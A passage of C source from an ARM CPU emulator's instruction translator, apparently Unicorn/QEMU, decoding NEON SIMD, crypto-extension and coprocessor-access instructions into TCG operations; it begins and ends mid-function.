also VQMOVUN; op field and mnemonics don't line up */ if (rm & 1) { return 1; } tmp2 = NULL; for (pass = 0; pass < 2; pass++) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); tmp = tcg_temp_new_i32(tcg_ctx); gen_neon_narrow_op(tcg_ctx, op == NEON_2RM_VMOVN, q, size, tmp, tcg_ctx->cpu_V0); if (pass == 0) { tmp2 = tmp; } else { neon_store_reg(tcg_ctx, rd, 0, tmp2); neon_store_reg(tcg_ctx, rd, 1, tmp); } } break; case NEON_2RM_VSHLL: if (q || (rd & 1)) { return 1; } tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); for (pass = 0; pass < 2; pass++) { if (pass == 1) tmp = tmp2; gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, 1); tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 8 << size); neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } break; case NEON_2RM_VCVT_F16_F32: { TCGv_ptr fpst; TCGv_i32 ahp; if (!dc_isar_feature(aa32_fp16_spconv, s) || q || (rm & 1)) { return 1; } fpst = get_fpstatus_ptr(tcg_ctx, true); ahp = get_ahp_flag(tcg_ctx); tmp = neon_load_reg(tcg_ctx, rm, 0); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tmp, fpst, ahp); tmp2 = neon_load_reg(tcg_ctx, rm, 1); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp2, tmp2, fpst, ahp); tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tmp = neon_load_reg(tcg_ctx, rm, 2); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tmp, fpst, ahp); tmp3 = neon_load_reg(tcg_ctx, rm, 3); neon_store_reg(tcg_ctx, rd, 0, tmp2); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp3, tmp3, fpst, ahp); tcg_gen_shli_i32(tcg_ctx, tmp3, tmp3, 16); tcg_gen_or_i32(tcg_ctx, tmp3, tmp3, tmp); neon_store_reg(tcg_ctx, rd, 1, tmp3); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, ahp); tcg_temp_free_ptr(tcg_ctx, fpst); break; } case NEON_2RM_VCVT_F32_F16: { TCGv_ptr fpst; TCGv_i32 ahp; if (!dc_isar_feature(aa32_fp16_spconv, s) || q || (rd & 1)) { return 1; } fpst = get_fpstatus_ptr(tcg_ctx, true); ahp = get_ahp_flag(tcg_ctx); tmp3 = tcg_temp_new_i32(tcg_ctx); tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp3, tmp3, fpst, ahp); neon_store_reg(tcg_ctx, rd, 0, tmp3); tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp, tmp, fpst, ahp); neon_store_reg(tcg_ctx, rd, 1, tmp); tmp3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp2); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp3, tmp3, fpst, ahp); neon_store_reg(tcg_ctx, rd, 2, tmp3); tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp2, tmp2, fpst, ahp); neon_store_reg(tcg_ctx, rd, 3, tmp2); tcg_temp_free_i32(tcg_ctx, ahp); tcg_temp_free_ptr(tcg_ctx, fpst); break; } case NEON_2RM_AESE: case NEON_2RM_AESMC: if (!dc_isar_feature(aa32_aes, s) || ((rm | rd) & 1)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rm); /* Bit 6 is the lowest opcode bit; it distinguishes between * encryption (AESE/AESMC) and decryption (AESD/AESIMC) */ tmp3 = tcg_const_i32(tcg_ctx, extract32(insn, 6, 1)); if (op == NEON_2RM_AESE) { gen_helper_crypto_aese(tcg_ctx, ptr1, ptr2, tmp3); } else { gen_helper_crypto_aesmc(tcg_ctx, ptr1, ptr2, tmp3); } tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); tcg_temp_free_i32(tcg_ctx, tmp3); break; case NEON_2RM_SHA1H: if (!dc_isar_feature(aa32_sha1, s) || ((rm | rd) & 1)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rm); gen_helper_crypto_sha1h(tcg_ctx, ptr1, ptr2); tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); break; case NEON_2RM_SHA1SU1: if ((rm | rd) & 1) { return 1; } /* bit 6 (q): set -> SHA256SU0, cleared -> SHA1SU1 */ if (q) { if (!dc_isar_feature(aa32_sha2, s)) { return 1; } } else if (!dc_isar_feature(aa32_sha1, s)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rm); if (q) { gen_helper_crypto_sha256su0(tcg_ctx, ptr1, ptr2); } else { gen_helper_crypto_sha1su1(tcg_ctx, ptr1, ptr2); } tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); break; case NEON_2RM_VMVN: tcg_gen_gvec_not(tcg_ctx, 0, rd_ofs, rm_ofs, vec_size, vec_size); break; case NEON_2RM_VNEG: tcg_gen_gvec_neg(tcg_ctx, size, rd_ofs, rm_ofs, vec_size, vec_size); break; case NEON_2RM_VABS: tcg_gen_gvec_abs(tcg_ctx, size, rd_ofs, rm_ofs, vec_size, vec_size); break; default: elementwise: for (pass = 0; pass < (q ? 4 : 2); pass++) { tmp = neon_load_reg(tcg_ctx, rm, pass); switch (op) { case NEON_2RM_VREV32: switch (size) { case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; case 1: gen_swap_half(tcg_ctx, tmp); break; default: abort(); } break; case NEON_2RM_VREV16: gen_rev16(tcg_ctx, tmp, tmp); break; case NEON_2RM_VCLS: switch (size) { case 0: gen_helper_neon_cls_s8(tcg_ctx, tmp, tmp); break; case 1: gen_helper_neon_cls_s16(tcg_ctx, tmp, tmp); break; case 2: gen_helper_neon_cls_s32(tcg_ctx, tmp, tmp); break; default: abort(); } break; case NEON_2RM_VCLZ: switch (size) { case 0: gen_helper_neon_clz_u8(tcg_ctx, tmp, tmp); break; case 1: gen_helper_neon_clz_u16(tcg_ctx, tmp, tmp); break; case 2: tcg_gen_clzi_i32(tcg_ctx, tmp, tmp, 32); break; default: abort(); } break; case NEON_2RM_VCNT: gen_helper_neon_cnt_u8(tcg_ctx, tmp, tmp); break; case NEON_2RM_VQABS: switch (size) { case 0: gen_helper_neon_qabs_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 1: gen_helper_neon_qabs_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 2: gen_helper_neon_qabs_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; default: abort(); } break; case NEON_2RM_VQNEG: switch (size) { case 0: gen_helper_neon_qneg_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 1: gen_helper_neon_qneg_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 2: gen_helper_neon_qneg_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; default: abort(); } break; case NEON_2RM_VCGT0: case NEON_2RM_VCLE0: tmp2 = tcg_const_i32(tcg_ctx, 0); switch(size) { case 0: gen_helper_neon_cgt_s8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_cgt_s16(tcg_ctx, tmp, tmp, tmp2); break; case 2: gen_helper_neon_cgt_s32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); if (op == NEON_2RM_VCLE0) { tcg_gen_not_i32(tcg_ctx, tmp, tmp); } break; case NEON_2RM_VCGE0: case NEON_2RM_VCLT0: tmp2 = tcg_const_i32(tcg_ctx, 0); switch(size) { case 0: gen_helper_neon_cge_s8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_cge_s16(tcg_ctx, tmp, tmp, tmp2); break; case 2: gen_helper_neon_cge_s32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); if (op == NEON_2RM_VCLT0) { tcg_gen_not_i32(tcg_ctx, tmp, tmp); } break; case NEON_2RM_VCEQ0: tmp2 = tcg_const_i32(tcg_ctx, 0); switch(size) { case 0: gen_helper_neon_ceq_u8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_ceq_u16(tcg_ctx, tmp, tmp, tmp2); break; case 2: gen_helper_neon_ceq_u32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); break; case NEON_2RM_VCGT0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCGE0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCEQ0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCLE0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCLT0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VABS_F: gen_helper_vfp_abss(tcg_ctx, tmp, tmp); break; case NEON_2RM_VNEG_F: gen_helper_vfp_negs(tcg_ctx, tmp, tmp); break; case NEON_2RM_VSWP: tmp2 = neon_load_reg(tcg_ctx, rd, pass); neon_store_reg(tcg_ctx, rm, pass, tmp2); break; case NEON_2RM_VTRN: tmp2 = neon_load_reg(tcg_ctx, rd, pass); switch (size) { case 0: gen_neon_trn_u8(tcg_ctx, tmp, tmp2); break; case 1: gen_neon_trn_u16(tcg_ctx, tmp, tmp2); break; default: abort(); } neon_store_reg(tcg_ctx, rm, pass, tmp2); break; case NEON_2RM_VRINTN: case NEON_2RM_VRINTA: case NEON_2RM_VRINTM: case NEON_2RM_VRINTP: case NEON_2RM_VRINTZ: { TCGv_i32 tcg_rmode; TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); int rmode; if (op == NEON_2RM_VRINTZ) { rmode = FPROUNDING_ZERO; } else { rmode = fp_decode_rm[((op & 0x6) >> 1) ^ 1]; } tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); gen_helper_rints(tcg_ctx, tmp, tmp, fpstatus); gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); tcg_temp_free_ptr(tcg_ctx, fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); break; } case NEON_2RM_VRINTX: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_rints_exact(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVTAU: case NEON_2RM_VCVTAS: case NEON_2RM_VCVTNU: case NEON_2RM_VCVTNS: case NEON_2RM_VCVTPU: case NEON_2RM_VCVTPS: case NEON_2RM_VCVTMU: case NEON_2RM_VCVTMS: { bool is_signed = !extract32(insn, 7, 1); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, 1); TCGv_i32 tcg_rmode, tcg_shift; int rmode = fp_decode_rm[extract32(insn, 8, 2)]; tcg_shift = tcg_const_i32(tcg_ctx, 0); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); if (is_signed) { gen_helper_vfp_tosls(tcg_ctx, tmp, tmp, tcg_shift, fpst); } else { gen_helper_vfp_touls(tcg_ctx, tmp, tmp, tcg_shift, fpst); } gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_i32(tcg_ctx, tcg_shift); tcg_temp_free_ptr(tcg_ctx, fpst); break; } case NEON_2RM_VRECPE: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_recpe_u32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VRSQRTE: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_rsqrte_u32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VRECPE_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_recpe_f32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VRSQRTE_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_rsqrte_f32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_FS: /* VCVT.F32.S32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_sitos(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_FU: /* VCVT.F32.U32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_uitos(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_SF: /* VCVT.S32.F32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_tosizs(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_UF: /* VCVT.U32.F32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_touizs(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } default: /* Reserved op values were caught by the * neon_2rm_sizes[] check earlier. */ abort(); } neon_store_reg(tcg_ctx, rd, pass, tmp); } break; } } else if ((insn & (1 << 10)) == 0) { /* VTBL, VTBX. */ int n = ((insn >> 8) & 3) + 1; if ((rn + n) > 32) { /* This is UNPREDICTABLE; we choose to UNDEF to avoid the * helper function running off the end of the register file. */ return 1; } n <<= 3; if (insn & (1 << 6)) { tmp = neon_load_reg(tcg_ctx, rd, 0); } else { tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); } tmp2 = neon_load_reg(tcg_ctx, rm, 0); ptr1 = vfp_reg_ptr(tcg_ctx, true, rn); tmp5 = tcg_const_i32(tcg_ctx, n); gen_helper_neon_tbl(tcg_ctx, tmp2, tmp2, tmp, ptr1, tmp5); tcg_temp_free_i32(tcg_ctx, tmp); if (insn & (1 << 6)) { tmp = neon_load_reg(tcg_ctx, rd, 1); } else { tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); } tmp3 = neon_load_reg(tcg_ctx, rm, 1); gen_helper_neon_tbl(tcg_ctx, tmp3, tmp3, tmp, ptr1, tmp5); tcg_temp_free_i32(tcg_ctx, tmp5); tcg_temp_free_ptr(tcg_ctx, ptr1); neon_store_reg(tcg_ctx, rd, 0, tmp2); neon_store_reg(tcg_ctx, rd, 1, tmp3); tcg_temp_free_i32(tcg_ctx, tmp); } else if ((insn & 0x380) == 0) { /* VDUP */ int element; MemOp size; if ((insn & (7 << 16)) == 0 || (q && (rd & 1))) { return 1; } if (insn & (1 << 16)) { size = MO_8; element = (insn >> 17) & 7; } else if (insn & (1 << 17)) { size = MO_16; element = (insn >> 18) & 3; } else { size = MO_32; element = (insn >> 19) & 1; } tcg_gen_gvec_dup_mem(tcg_ctx, size, neon_reg_offset(rd, 0), neon_element_offset(rm, element, size), q ? 16 : 8, q ? 16 : 8); } else { return 1; } } } return 0; } /* Advanced SIMD three registers of the same length extension. * 31 25 23 22 20 16 12 11 10 9 8 3 0 * +---------------+-----+---+-----+----+----+---+----+---+----+---------+----+ * | 1 1 1 1 1 1 0 | op1 | D | op2 | Vn | Vd | 1 | o3 | 0 | o4 | N Q M U | Vm | * +---------------+-----+---+-----+----+----+---+----+---+----+---------+----+ */ static int disas_neon_insn_3same_ext(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_3 *fn_gvec = NULL; gen_helper_gvec_3_ptr *fn_gvec_ptr = NULL; int rd, rn, rm, opr_sz; int data = 0; int off_rn, off_rm; bool is_long = false, q = extract32(insn, 6, 1); bool ptr_is_env = false; if ((insn & 0xfe200f10) == 0xfc200800) { /* VCMLA -- 1111 110R R.1S .... .... 1000 ...0 .... */ int size = extract32(insn, 20, 1); data = extract32(insn, 23, 2); /* rot */ if (!dc_isar_feature(aa32_vcma, s) || (!size && !dc_isar_feature(aa32_fp16_arith, s))) { return 1; } fn_gvec_ptr = size ? gen_helper_gvec_fcmlas : gen_helper_gvec_fcmlah; } else if ((insn & 0xfea00f10) == 0xfc800800) { /* VCADD -- 1111 110R 1.0S .... .... 1000 ...0 .... */ int size = extract32(insn, 20, 1); data = extract32(insn, 24, 1); /* rot */ if (!dc_isar_feature(aa32_vcma, s) || (!size && !dc_isar_feature(aa32_fp16_arith, s))) { return 1; } fn_gvec_ptr = size ? gen_helper_gvec_fcadds : gen_helper_gvec_fcaddh; } else if ((insn & 0xfeb00f00) == 0xfc200d00) { /* V[US]DOT -- 1111 1100 0.10 .... .... 1101 .Q.U .... */ bool u = extract32(insn, 4, 1); if (!dc_isar_feature(aa32_dp, s)) { return 1; } fn_gvec = u ? gen_helper_gvec_udot_b : gen_helper_gvec_sdot_b; } else if ((insn & 0xff300f10) == 0xfc200810) { /* VFM[AS]L -- 1111 1100 S.10 .... .... 1000 .Q.1 .... */ int is_s = extract32(insn, 23, 1); if (!dc_isar_feature(aa32_fhm, s)) { return 1; } is_long = true; data = is_s; /* is_2 == 0 */ fn_gvec_ptr = gen_helper_gvec_fmlal_a32; ptr_is_env = true; } else { return 1; } VFP_DREG_D(rd, insn); if (rd & q) { return 1; } if (q || !is_long) { VFP_DREG_N(rn, insn); VFP_DREG_M(rm, insn); if ((rn | rm) & q & !is_long) { return 1; } off_rn = vfp_reg_offset(1, rn); off_rm = vfp_reg_offset(1, rm); } else { rn = VFP_SREG_N(insn); rm = VFP_SREG_M(insn); off_rn = vfp_reg_offset(0, rn); off_rm = vfp_reg_offset(0, rm); } if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) { return 1; } opr_sz = (1 + q) * 8; if (fn_gvec_ptr) { TCGv_ptr ptr; if (ptr_is_env) { ptr = tcg_ctx->cpu_env; } else { ptr = get_fpstatus_ptr(tcg_ctx, 1); } tcg_gen_gvec_3_ptr(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, ptr, opr_sz, opr_sz, data, fn_gvec_ptr); if (!ptr_is_env) { tcg_temp_free_ptr(tcg_ctx, ptr); } } else { tcg_gen_gvec_3_ool(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, opr_sz, opr_sz, data, fn_gvec); } return 0; } /* Advanced SIMD two registers and a scalar extension. * 31 24 23 22 20 16 12 11 10 9 8 3 0 * +-----------------+----+---+----+----+----+---+----+---+----+---------+----+ * | 1 1 1 1 1 1 1 0 | o1 | D | o2 | Vn | Vd | 1 | o3 | 0 | o4 | N Q M U | Vm | * +-----------------+----+---+----+----+----+---+----+---+----+---------+----+ * */ static int disas_neon_insn_2reg_scalar_ext(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_3 *fn_gvec = NULL; gen_helper_gvec_3_ptr *fn_gvec_ptr = NULL; int rd, rn, rm, opr_sz, data; int off_rn, off_rm; bool is_long = false, q = extract32(insn, 6, 1); bool ptr_is_env = false; if ((insn & 0xff000f10) == 0xfe000800) { /* VCMLA (indexed) -- 1111 1110 S.RR .... .... 1000 ...0 .... */ int rot = extract32(insn, 20, 2); int size = extract32(insn, 23, 1); int index; if (!dc_isar_feature(aa32_vcma, s)) { return 1; } if (size == 0) { if (!dc_isar_feature(aa32_fp16_arith, s)) { return 1; } /* For fp16, rm is just Vm, and index is M. */ rm = extract32(insn, 0, 4); index = extract32(insn, 5, 1); } else { /* For fp32, rm is the usual M:Vm, and index is 0. */ VFP_DREG_M(rm, insn); index = 0; } data = (index << 2) | rot; fn_gvec_ptr = (size ? gen_helper_gvec_fcmlas_idx : gen_helper_gvec_fcmlah_idx); } else if ((insn & 0xffb00f00) == 0xfe200d00) { /* V[US]DOT -- 1111 1110 0.10 .... .... 1101 .Q.U .... */ int u = extract32(insn, 4, 1); if (!dc_isar_feature(aa32_dp, s)) { return 1; } fn_gvec = u ? gen_helper_gvec_udot_idx_b : gen_helper_gvec_sdot_idx_b; /* rm is just Vm, and index is M. */ data = extract32(insn, 5, 1); /* index */ rm = extract32(insn, 0, 4); } else if ((insn & 0xffa00f10) == 0xfe000810) { /* VFM[AS]L -- 1111 1110 0.0S .... .... 1000 .Q.1 .... */ int is_s = extract32(insn, 20, 1); int vm20 = extract32(insn, 0, 3); int vm3 = extract32(insn, 3, 1); int m = extract32(insn, 5, 1); int index; if (!dc_isar_feature(aa32_fhm, s)) { return 1; } if (q) { rm = vm20; index = m * 2 + vm3; } else { rm = vm20 * 2 + m; index = vm3; } is_long = true; data = (index << 2) | is_s; /* is_2 == 0 */ fn_gvec_ptr = gen_helper_gvec_fmlal_idx_a32; ptr_is_env = true; } else { return 1; } VFP_DREG_D(rd, insn); if (rd & q) { return 1; } if (q || !is_long) { VFP_DREG_N(rn, insn); if (rn & q & !is_long) { return 1; } off_rn = vfp_reg_offset(1, rn); off_rm = vfp_reg_offset(1, rm); } else { rn = VFP_SREG_N(insn); off_rn = vfp_reg_offset(0, rn); off_rm = vfp_reg_offset(0, rm); } if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) { return 1; } opr_sz = (1 + q) * 8; if (fn_gvec_ptr) { TCGv_ptr ptr; if (ptr_is_env) { ptr = tcg_ctx->cpu_env; } else { ptr = get_fpstatus_ptr(tcg_ctx, 1); } tcg_gen_gvec_3_ptr(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, ptr, opr_sz, opr_sz, data, fn_gvec_ptr); if (!ptr_is_env) { tcg_temp_free_ptr(tcg_ctx, ptr); } } else { tcg_gen_gvec_3_ool(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, opr_sz, opr_sz, data, fn_gvec); } return 0; } static int disas_coproc_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int cpnum, is64, crn, crm, opc1, opc2, isread, rt, rt2; const ARMCPRegInfo *ri; cpnum = (insn >> 8) & 0xf; /* First check for coprocessor space used for XScale/iwMMXt insns */ if (arm_dc_feature(s, ARM_FEATURE_XSCALE) && (cpnum < 2)) { if (extract32(s->c15_cpar, cpnum, 1) == 0) { return 1; } if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { return disas_iwmmxt_insn(s, insn); } else if (arm_dc_feature(s, ARM_FEATURE_XSCALE)) { return disas_dsp_insn(s, insn); } return 1; } /* Otherwise treat as a generic register access */ is64 = (insn & (1 << 25)) == 0; if (!is64 && ((insn & (1 << 4)) == 0)) { /* cdp */ return 1; } crm = insn & 0xf; if (is64) { crn = 0; opc1 = (insn >> 4) & 0xf; opc2 = 0; rt2 = (insn >> 16) & 0xf; } else { crn = (insn >> 16) & 0xf; opc1 = (insn >> 21) & 7; opc2 = (insn >> 5) & 7; rt2 = 0; } isread = (insn >> 20) & 1; rt = (insn >> 12) & 0xf; ri = get_arm_cp_reginfo(s->cp_regs, ENCODE_CP_REG(cpnum, is64, s->ns, crn, crm, opc1, opc2)); if (ri) { bool need_exit_tb; /* Check access permissions */ if (!cp_access_ok(s->current_el, ri, isread)) { return 1; } if (s->hstr_active || ri->accessfn || (arm_dc_feature(s, ARM_FEATURE_XSCALE) && cpnum < 14)) { /* Emit code to perform further access permissions checks at * runtime; this may result in an exception. * Note that on XScale all cp0..c13 registers do an access check * call in order to handle c15_cpar. */ TCGv_ptr tmpptr; TCGv_i32 tcg_syn, tcg_isread; uint32_t syndrome; /* Note that since we are an implementation which takes an * exception on a trapped conditional instruction only if the * instruction passes its condition code check, we can take * advantage of the clause in the ARM ARM that allows us to set * the COND field in the instruction to 0xE in all cases. * We could fish the actual condition out of the insn (ARM) * or the condexec bits (Thumb) but it isn't necessary. */ switch (cpnum) { case 14: if (is64) { syndrome = syn_cp14_rrt_trap(1, 0xe, opc1, crm, rt, rt2, isread, false); } else { syndrome = syn_cp14_rt_trap(1, 0xe, opc1, opc2, crn, crm, rt, isread, false); } break; case 15: if (is64) { syndrome = syn_cp15_rrt_trap(1, 0xe, opc1, crm, rt, rt2, isread, false); } else { syndrome = syn_cp15_rt_trap(1, 0xe, opc1, opc2, crn, crm, rt, isread, false); } break; default: /* ARMv8 defines that only coprocessors 14 and 15 exist, * so this can only happen if this is an ARMv7 or earlier CPU, * in which case the syndrome information won't actually be * guest visible. */ assert(!arm_dc_feature(s, ARM_FEATURE_V8)); syndrome = syn_uncategorized(); break; } gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tmpptr = tcg_const_ptr(tcg_ctx, ri); tcg_syn = tcg_const_i32(tcg_ctx, syndrome); tcg_isread = tcg_const_i32(tcg_ctx, isread); gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn, tcg_isread); tcg_temp_free_ptr(tcg_ctx, tmpptr); tcg_temp_free_i32(tcg_ctx, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_isread); } else if (ri->type & ARM_CP_RAISES_EXC) { /* * The readfn or writefn might raise an exception; * synchronize the CPU state in case it does. */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); } /* Handle special cases first */ switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { case ARM_CP_NOP: return 0; case ARM_CP_WFI: if (isread) { return 1; } gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_WFI; return 0; default: break; } if ((tb_cflags(s->base.tb) & CF_USE_ICOUNT) && (ri->type & ARM_CP_IO)) { // gen_io_start(tcg_ctx); } if (isread) { /* Read */ if (is64) { TCGv_i64 tmp64; TCGv_i32 tmp; if (ri->type & ARM_CP_CONST) { tmp64 = tcg_const_i64(tcg_ctx, ri->resetvalue); } else if (ri->readfn) { TCGv_ptr tmpptr; tmp64 = tcg_temp_new_i64(tcg_ctx); tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_get_cp_reg64(tcg_ctx, tmp64, tcg_ctx->cpu_env, tmpptr); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tmp64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); } tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tmp64); store_reg(s, rt, tmp); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrh_i64_i32(tcg_ctx, tmp, tmp64); 